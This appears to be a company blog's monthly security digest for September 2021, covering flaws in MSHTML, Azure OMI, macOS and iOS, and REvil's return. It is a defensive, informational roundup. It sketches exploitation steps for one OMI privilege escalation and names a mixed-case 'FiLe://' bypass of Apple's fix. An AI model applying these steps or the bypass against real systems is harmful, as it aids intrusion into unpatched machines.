Sam Stelfox

Enterprise Cybersecurity Roundup [September 2021]

  • Critical vulnerabilities found in Azure and Internet Explorer browser engine - Skip to details 
  • Zero-day attack vectors located in macOS and iOS devices - Skip to details 
  • REvil Malware-as-a-Service organization returns from hiatus - Skip to details 

<img src="enterprise-cybersecurity-roundup-minim-sep-2021.png" alt="enterprise cybersecurity roundup september 2021 minim">

Minim's cybersecurity roundup is a monthly digest of the latest security threats, such as malware, breaches, vulnerabilities, and more. Where possible, we provide additional documentation in the form of discovery reports and share best practices. To stay informed, subscribe to our newsletter at the bottom of the page. 

Critical vulnerabilities in Microsoft MSHTML and Azure 

Microsoft software had over 90 vulnerabilities reported in September, including the recently discovered zero-day vulnerability CVE-2021-40444 allowing for remote code execution (RCE). Discovered in Internet Explorer’s browser engine, MSTML, the vulnerability affects Windows Server 2008-2019 and Windows 8.1-10 and sits at an 8.8 severity rating. Matthew Warner, CTO of Blumira, explains that it utilizes Office documents and an ActiveX control to achieve up to full compromise of a Windows system. 

Security researchers at McAfee explain that there are default protections in place in the form of Windows' Mark of the Web (MoTW) used to enable Protected Mode in Office software. This ensures the ActiveX control used to cause compromise isn't executedStill, they warn that users who suffer from "confirmation fatigue" (i.e., users who dismiss the Protected View message out of annoyance) could inadvertently trigger the exploit. It more easily infiltrates via Office application preview panes and the Windows Explorer preview pane, as users running Outlook must open the file for the malware to be executed.  

The Microsoft Security Resource Center and other security researchers advise applying the patch published on 09/14/2021 to defend against the attack. They further explain as of September 23rd that "customers whose Windows devices are configured to receive automatic updates do not need to take any further action." For those who cannot implement the patch immediately, Microsoft recommends disabling ActiveX controls via Group Policy and disabling preview in Windows Explorer, while Blumira recommends educating end users about Protected View. 

To test if your Windows system is susceptible to CVE-2021-40444, exploit developer lockedbyte has created a Proof of Concept (PoC) diagnostic tool which will harmlessly exploit the Office vulnerability to illustrate a system's current standing.  

Meanwhile, Azure was discovered to have four vulnerabilities, analyzed by security researchers at Wiz and estimated to affect 65% of Azure tenants prior to the patch: 

Vulnerability 

Severity 

Description 

CVE-2021-38647 

Critical: 9.8 

RCE as root. Infiltrates via portions of Azure that expose HTTPS port 5984 (WinRM port). 

CVE-2021-38648 

High: 7.8 

Local privilege escalation. Intercept communication between omicli and omiengine. Record omicli execution request, remove authentication handshake, deploy command execution. 

CVE-2021-38645 

High: 7.8 

Local privilege escalation. Falsify credentials to omiengine, start a second thread, sendid >> /tmp/win, use second threat to send an authentication request and successful authentication response with uid=0gid=0. 

CVE-2021-38649 

High: 7.0 

Local privilege escalation. 

According to Wiz, these vulnerabilities affect Azure customers utilizing Linux machines (more than half of all Azure instances) and those who depend upon services like Azure Automation, Azure Log Analytics, Azure Configuration Management, and much more. Linux VMs within the Azure cloud come pre-loaded with the Open Management Infrastructure (OMI) agent, which works similarly to Windows Management Instrumentation (WMI) as a Common Information Model (CIMmanagement server. As these vulnerabilities target OMI as an attack vector, Wiz has cheekily titled this set of vulnerabilities OMIGOD. 

Microsoft has released a patch for these vulnerabilities as of September 8th, 2021. To see if you may be affected or read a programmatic breakdown of each vulnerability, visit Wiz.io to learn more.  

Zero-day bugs found in iOS and macOS devices 

Independent security researcher Park Minchan discovered that macOS Finder housed a zero-day RCE vulnerability which executes embedded commands in .inetloc files. Affecting macOS Big Sur and previous versions, Minchan specifies in the comments of SSD Disclosure's Advisory that this exploit can be triggered through various applications including Mail, iMessage, and even Microsoft Office. If the exploit is implemented with an email attachment, it will execute on a system without any prompt or warning. 

.inetloc files serve as shortcuts to Internet locations, directing to resources like RSS feeds and telnet locations. This filetype is also known to contain server addresses and credentials for SSH/telnet connections. Although Apple did not assign this vulnerability a CVE, it was silently patched to block the exploit technique of using the file:// prefix which runs local files. However, further testing illustrated that the check was not case sensitive and could be bypassed by altering the string to something like FiLe:// 

Bleeping Computer also tested the exploit and found that the PoC code passed through anti-malware engines on VirusTotalwhich indicates that anti-malware software may not be able to thwart this attack. It is advised to treat any .inetloc file attachments on macOS machines with utmost caution, especially until an officially recognized patch is released. 

Alongside this vulnerability, four zero-day bugs were found by security researcher illusionofchaos on Habr. Each of these vulnerabilities can exfiltrate sensitive information and present the information in the user interface: 

Vulnerability Name 

Description 

PoC Source Code 

Gamed 0-day 

Acquires Apple ID email & authentication token, full name, file system read access to Core Duet database (contacts, Mail, SMS, iMessage, etc.), metadata about contact, etc. Utilizes holes in XPC service check. 

ios-gamed-0day 

Nehelper Enumerate Installed Apps 0-day 

Uses bundle ID (unique string as an app identifier) to determine if an application is installed on a device. 

ios-nehelper-enum-apps-0day 

Nehelper Wifi Info 0-day 

Acquires WiFi information without required permissions. Skips com.apple.developer.networking.wifi-info check with user-crafted sdk-version parameter. 

ios-nehelper-wifi-info-0day 

Analyticsd 

Patched in iOS 14.7. Allowed any user-installed application to access analytics logs which contained information such as medical information, device usage, screen time, session count, bundle IDs, device accessory information, etc. Vulnerability persisted even when "Share analytics" setting was disabled. 

ios-analyticsd-pre14.7-exploit 

All of these vulnerabilities have been brought to Apple's attentionHowever, Apple has not assigned any official CVEs. Most of their responses include that they will be investigating these incidents further, and as for the September 20th security contents list regarding iOS 15.0, illusionofchaos specifies that these vulnerabilities remain unpatched. There is also no mention of an official patch in the continuation articleIn the meantime, iOS users will have to remain patiently watchful for an official update from Apple. 

REvil returns: a recap of the dangers of ransomware 

News on the Ransomware-as-a-Service (RaaS) organization REvil has been quiet since the July 2nd attack on VSA servers at Kaseya, a managed service provider of IT solutions, news on the. However, REvil has returned under the same name disrupting hacking forums online. Their dark web servers appear to have been re-activated and a sample of REvil ransomware has been uploaded to VirusTotal. Furthermore, the login functionality to their Tor payment site has also returned. 

Bleeping Computer details news pointing to reasons for the hiatus. One operator from REvil claims they were merely taking a break, while posts on hacking forums suggest REvil went into hiding from law enforcement after the disappearance of the threat actor "Unknown" (or "UNKN"). Unknown understood REvil's business model and had performed recruitment for RaaS operations. Translated from Russian, posts about the impact of his disappearance describe the organization's consequential struggle. 

As Unknown (aka 8800) disappeared, we (the coders) backed up and turned off all the servers. Thought that he was arrested. We tried to search, but to no avail. We waited - he did not show up and we restored everything from backups. After UNKWN disappeared, the hoster informed us that the Clearnet servers were compromised and they deleted them at once. We shut down the main server with the keys right afterward.

 

Kaseya decryptor, which was allegedly leaked by the law enforcement, in fact, was leaked by one of our operators during the generation of the decryptor. 

 

REvil - Bleeping Computer 

Hacking forum posts from Unknown in July state that REvil ransomware is "written in pure C, using inline assembler with the possibility of modifying functionality out of the box.Research from Palo Alto Networks indicates REvil uses phishing emails with malicious file attachments or Remote Desktop Protocol (RDP) with compromised credentials to gain network access. Some incidents, however, have utilized CVEs in Microsoft Exchange Servers and SonicWall. Once infiltrated, REvil has been known for its devotion to double extortion tactics: encrypting data to lock out their victims' access while exfiltrating the data with the threat of leaking the information to the public. 

As evidence points to REvil's resurgence, remaining watchful of networks and implementing ransomware prevention best practices will be vital to protecting assets. Ransomware has been merciless in halting operations, going as far as impeding surgical procedures and healthcare services. It's recommended to regularly update offline backups of company data, whether it be in private storage or a cloud storage system. For more best practices on ransomware protection, prevention, and post-infection remediation, visit StopRansomware.gov.

More enterprise cybersecurity roundups you may enjoy 

We want to keep you informed of recent cybersecurity news and the current threatscape. If you want to receive our monthly newsletter, please subscribe below. Please enjoy the following articles: 

Interested in learning more about Minim?

Get in touch